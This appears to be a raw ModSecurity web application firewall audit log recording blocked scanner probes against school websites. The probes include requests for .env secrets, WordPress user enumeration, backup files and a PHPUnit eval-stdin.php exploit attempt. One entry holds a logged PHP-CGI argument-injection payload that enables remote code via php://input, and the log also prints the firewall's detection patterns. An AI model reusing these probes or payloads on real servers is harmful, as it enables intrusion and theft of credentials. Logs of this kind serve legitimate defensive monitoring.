p4=0, p5=28, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00b5e226-Z-- --3b7cef34-A-- [19/May/2025:09:46:05 +0700] aCqbbTuVdcwZ_qZ5ZIol_QAAAAo 103.236.140.4 38750 103.236.140.4 8181 --3b7cef34-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.227.154.122 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.227.154.122 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3b7cef34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b7cef34-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747622765025897 877 (- - -) Stopwatch2: 1747622765025897 877; combined=395, p1=355, p2=0, p3=0, p4=0, p5=40, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b7cef34-Z-- --fcb4d81c-A-- [19/May/2025:09:51:00 +0700] aCqclDuVdcwZ_qZ5ZIomAQAAAAU 103.236.140.4 38776 103.236.140.4 8181 --fcb4d81c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.10.59.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.10.59.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fcb4d81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb4d81c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747623060911936 3162 (- - -) Stopwatch2: 1747623060911936 3162; combined=1329, p1=459, p2=835, p3=0, p4=0, p5=35, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb4d81c-Z-- --fcb4d81c-A-- [19/May/2025:10:09:38 +0700] aCqg8gZaP57SewDBUi9EQwAAAFc 103.236.140.4 38902 103.236.140.4 8181 --fcb4d81c-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --fcb4d81c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb4d81c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747624178301977 831 (- - -) Stopwatch2: 1747624178301977 831; combined=342, p1=306, p2=0, p3=0, p4=0, p5=36, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb4d81c-Z-- --55deed78-A-- [19/May/2025:10:20:27 +0700] aCqjewZaP57SewDBUi9ETQAAAEs 103.236.140.4 38950 103.236.140.4 8181 --55deed78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 5.190.235.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 5.190.235.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --55deed78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55deed78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747624827662624 3249 (- - -) Stopwatch2: 1747624827662624 3249; combined=1427, p1=568, p2=830, p3=0, p4=0, p5=29, sr=180, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55deed78-Z-- --c759b16d-A-- [19/May/2025:10:33:28 +0700] aCqmiGyGBQNQTJej4E6LYQAAAIQ 103.236.140.4 39004 103.236.140.4 8181 --c759b16d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.15.91.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.15.91.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c759b16d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c759b16d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747625608046976 24720 (- - -) Stopwatch2: 1747625608046976 24720; combined=2906, p1=1409, p2=1457, p3=0, p4=0, p5=40, sr=151, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c759b16d-Z-- --c579c17d-A-- [19/May/2025:11:04:32 +0700] aCqt0GyGBQNQTJej4E6N6QAAAIo 103.236.140.4 47866 103.236.140.4 8181 --c579c17d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.245.205.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.245.205.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c579c17d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c579c17d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747627472932606 2442 (- - -) Stopwatch2: 1747627472932606 2442; combined=1069, p1=365, p2=681, p3=0, p4=0, p5=23, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c579c17d-Z-- --4c9bc631-A-- [19/May/2025:11:50:49 +0700] aCq4qWyGBQNQTJej4E6wsAAAAIA 103.236.140.4 60930 103.236.140.4 8181 --4c9bc631-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.46.124.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.46.124.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4c9bc631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c9bc631-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747630249417011 2677 (- - -) Stopwatch2: 1747630249417011 2677; combined=1248, p1=444, p2=773, p3=0, p4=0, p5=31, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c9bc631-Z-- --5cdc520a-A-- [19/May/2025:12:11:53 +0700] aCq9mWyGBQNQTJej4E6_bAAAAJQ 103.236.140.4 39872 103.236.140.4 8181 --5cdc520a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --5cdc520a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cdc520a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631513139944 781 (- - -) Stopwatch2: 1747631513139944 781; combined=334, p1=297, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cdc520a-Z-- --a308096d-A-- [19/May/2025:12:11:53 +0700] aCq9mb8BMImlI6dyVeMECgAAAM4 103.236.140.4 39882 103.236.140.4 8181 --a308096d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G950F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --a308096d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a308096d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631513282802 842 (- - -) Stopwatch2: 1747631513282802 842; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a308096d-Z-- --b9bd4c44-A-- [19/May/2025:12:18:16 +0700] aCq_GGyGBQNQTJej4E7D5wAAAJg 103.236.140.4 59694 103.236.140.4 8181 --b9bd4c44-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Charset: utf-8 --b9bd4c44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9bd4c44-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631896966282 825 (- - -) Stopwatch2: 1747631896966282 825; combined=350, p1=314, p2=0, p3=0, p4=0, p5=36, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bd4c44-Z-- --58797703-A-- [19/May/2025:12:19:21 +0700] aCq_Wb8BMImlI6dyVeMK0gAAAM8 103.236.140.4 34770 103.236.140.4 8181 --58797703-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G935U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --58797703-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58797703-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747631961685273 956 (- - -) Stopwatch2: 1747631961685273 956; combined=434, p1=374, p2=0, p3=0, p4=0, p5=60, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58797703-Z-- --c5a6df29-A-- [19/May/2025:12:45:45 +0700] aCrFiWyGBQNQTJej4E7VAAAAAIY 103.236.140.4 59030 103.236.140.4 8181 --c5a6df29-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.243.205.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.243.205.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5a6df29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5a6df29-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747633545568321 2523 (- - -) Stopwatch2: 1747633545568321 2523; combined=1110, p1=358, p2=727, p3=0, p4=0, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5a6df29-Z-- --858fa807-A-- [19/May/2025:13:17:14 +0700] aCrM6gZaP57SewDBUi-xogAAAEk 103.236.140.4 33790 103.236.140.4 8181 --858fa807-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.198 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --858fa807-C-- --858fa807-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --858fa807-E-- --858fa807-H-- Message: Access denied with code 403 (phase 2). String match " --6f03c650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f03c650-E-- --6f03c650-H-- Message: Access denied with code 403 (phase 2). String match " --c12ddb07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c12ddb07-E-- --c12ddb07-H-- Message: Access denied with code 403 (phase 2). String match " --066b2570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --066b2570-H-- Message: Access denied with code 403 (phase 2). String match " --8a793e7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a793e7a-E-- --8a793e7a-H-- Message: Access denied with code 403 (phase 2). String match " --67008712-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --67008712-E-- --67008712-H-- Message: Access denied with code 403 (phase 2). 
String match " --35e9c17c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e9c17c-H-- Message: Access denied with code 403 (phase 2). String match " --18cd2a00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18cd2a00-E-- --18cd2a00-H-- Message: Access denied with code 403 (phase 2). String match " --44073014-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44073014-E-- --44073014-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747678384003118 4180 (- - -) Stopwatch2: 1747678384003118 4180; combined=2748, p1=523, p2=2191, p3=0, p4=0, p5=33, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44073014-Z-- --e836a02f-A-- [20/May/2025:01:45:15 +0700] aCt8O78BMImlI6dyVeN-HQAAAMk 103.236.140.4 38516 103.236.140.4 8181 --e836a02f-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 161.97.153.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 161.97.153.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; 1713-A01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --e836a02f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e836a02f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747680315018835 13816 (- - -) Stopwatch2: 1747680315018835 13816; combined=25817, p1=378, p2=0, p3=0, p4=0, p5=12742, sr=141, sw=0, l=0, gc=12697 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e836a02f-Z-- --026c1817-A-- [20/May/2025:02:06:48 +0700] aCuBSGyGBQNQTJej4E57AQAAAIE 103.236.140.4 59166 103.236.140.4 8181 --026c1817-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; Vivo 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --026c1817-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --026c1817-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747681608577062 884 (- - -) Stopwatch2: 1747681608577062 884; combined=402, p1=363, p2=0, p3=0, p4=0, p5=39, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --026c1817-Z-- --9849ef69-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEfgAAAME 103.236.140.4 58882 103.236.140.4 8181 --9849ef69-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150044696 --9849ef69-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9849ef69-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683200697943 2579 (- - -) Stopwatch2: 1747683200697943 2579; combined=1066, p1=568, p2=461, p3=0, p4=0, p5=37, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9849ef69-Z-- --49366863-A-- [20/May/2025:02:33:20 +0700] aCuHgL8BMImlI6dyVeOEgwAAAM8 103.236.140.4 58982 103.236.140.4 8181 --49366863-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162365449 --49366863-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --49366863-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] 